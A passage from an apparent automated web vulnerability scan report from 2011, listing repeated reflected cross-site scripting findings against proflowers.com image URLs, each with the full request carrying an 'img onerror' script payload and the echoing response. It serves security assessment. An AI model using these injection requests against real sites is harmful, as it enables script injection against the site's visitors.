Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:50 GMT
Connection: close

Unable to find /ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF733a8<img src=a onerror=alert(1)>699c828870e

1.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2ccba<img%20src%3da%20onerror%3dalert(1)>8ef0b6a0ff6 was submitted in the REST URL parameter 9. This input was echoed as 2ccba<img src=a onerror=alert(1)>8ef0b6a0ff6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF2ccba<img%20src%3da%20onerror%3dalert(1)>8ef0b6a0ff6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:10 GMT
Connection: close

Unable to find /ProvideCommerce/MBQhugskisses_rbye11_PF2ccba<img src=a onerror=alert(1)>8ef0b6a0ff6

1.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6a737<img%20src%3da%20onerror%3dalert(1)>47eeba19c2e was submitted in the REST URL parameter 9. This input was echoed as 6a737<img src=a onerror=alert(1)>47eeba19c2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF6a737<img%20src%3da%20onerror%3dalert(1)>47eeba19c2e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQithasitall_rbye10_PF6a737<img src=a onerror=alert(1)>47eeba19c2e

1.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e3afe<img%20src%3da%20onerror%3dalert(1)>9e93c1e129d was submitted in the REST URL parameter 9. This input was echoed as e3afe<img src=a onerror=alert(1)>9e93c1e129d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PFe3afe<img%20src%3da%20onerror%3dalert(1)>9e93c1e129d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/MBQjoyfulbouquet11_FC_PFe3afe<img src=a onerror=alert(1)>9e93c1e129d

1.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 995b4<img%20src%3da%20onerror%3dalert(1)>39f37b6a9ef was submitted in the REST URL parameter 9. This input was echoed as 995b4<img src=a onerror=alert(1)>39f37b6a9ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF995b4<img%20src%3da%20onerror%3dalert(1)>39f37b6a9ef?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/MBQlittleallthefrills_gv11_PF995b4<img src=a onerror=alert(1)>39f37b6a9ef

1.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d7a61<img%20src%3da%20onerror%3dalert(1)>2d0b0eab967 was submitted in the REST URL parameter 9. This input was echoed as d7a61<img src=a onerror=alert(1)>2d0b0eab967 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PFd7a61<img%20src%3da%20onerror%3dalert(1)>2d0b0eab967?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:56 GMT
Connection: close

Unable to find /ProvideCommerce/MBQmixedvdaycurly10_PFd7a61<img src=a onerror=alert(1)>2d0b0eab967

1.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5539<img%20src%3da%20onerror%3dalert(1)>cbd1b68987b was submitted in the REST URL parameter 9. This input was echoed as b5539<img src=a onerror=alert(1)>cbd1b68987b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PFb5539<img%20src%3da%20onerror%3dalert(1)>cbd1b68987b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQnewvdaybqt11_PFb5539<img src=a onerror=alert(1)>cbd1b68987b

1.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f2637<img%20src%3da%20onerror%3dalert(1)>a8c2691e770 was submitted in the REST URL parameter 9. This input was echoed as f2637<img src=a onerror=alert(1)>a8c2691e770 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PFf2637<img%20src%3da%20onerror%3dalert(1)>a8c2691e770?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/MBQrosesalstro_dmsk11_PFf2637<img src=a onerror=alert(1)>a8c2691e770

1.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 10a2c<img%20src%3da%20onerror%3dalert(1)>2c86fed5b29 was submitted in the REST URL parameter 9. This input was echoed as 10a2c<img src=a onerror=alert(1)>2c86fed5b29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF10a2c<img%20src%3da%20onerror%3dalert(1)>2c86fed5b29?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/MBQshowersflowers_dmsk11_PF10a2c<img src=a onerror=alert(1)>2c86fed5b29

1.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6a5cf<img%20src%3da%20onerror%3dalert(1)>3e463c184e7 was submitted in the REST URL parameter 9. This input was echoed as 6a5cf<img src=a onerror=alert(1)>3e463c184e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF6a5cf<img%20src%3da%20onerror%3dalert(1)>3e463c184e7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQtruspec11_PF6a5cf<img src=a onerror=alert(1)>3e463c184e7

1.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b56c4<img%20src%3da%20onerror%3dalert(1)>17d73dc25f3 was submitted in the REST URL parameter 9. This input was echoed as b56c4<img src=a onerror=alert(1)>17d73dc25f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PFb56c4<img%20src%3da%20onerror%3dalert(1)>17d73dc25f3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/MBQvdaytulipfreesia10_PFb56c4<img src=a onerror=alert(1)>17d73dc25f3

1.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ab17a<img%20src%3da%20onerror%3dalert(1)>cf29162016c was submitted in the REST URL parameter 9. This input was echoed as ab17a<img src=a onerror=alert(1)>cf29162016c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PFab17a<img%20src%3da%20onerror%3dalert(1)>cf29162016c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PFab17a<img src=a onerror=alert(1)>cf29162016c

1.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload db227<img%20src%3da%20onerror%3dalert(1)>38f92df87c2 was submitted in the REST URL parameter 9. This input was echoed as db227<img src=a onerror=alert(1)>38f92df87c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PFdb227<img%20src%3da%20onerror%3dalert(1)>38f92df87c2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PFdb227<img src=a onerror=alert(1)>38f92df87c2

1.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2d1b8<img%20src%3da%20onerror%3dalert(1)>9b08ddae393 was submitted in the REST URL parameter 9. This input was echoed as 2d1b8<img src=a onerror=alert(1)>9b08ddae393 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF2d1b8<img%20src%3da%20onerror%3dalert(1)>9b08ddae393?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 122
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF2d1b8<img src=a onerror=alert(1)>9b08ddae393

1.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e5fa6<img%20src%3da%20onerror%3dalert(1)>a43e173e065 was submitted in the REST URL parameter 9. This input was echoed as e5fa6<img src=a onerror=alert(1)>a43e173e065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PFe5fa6<img%20src%3da%20onerror%3dalert(1)>a43e173e065?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:54 GMT
Connection: close

Unable to find /ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PFe5fa6<img src=a onerror=alert(1)>a43e173e065

1.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3768b<img%20src%3da%20onerror%3dalert(1)>550117928d0 was submitted in the REST URL parameter 9. This input was echoed as 3768b<img src=a onerror=alert(1)>550117928d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

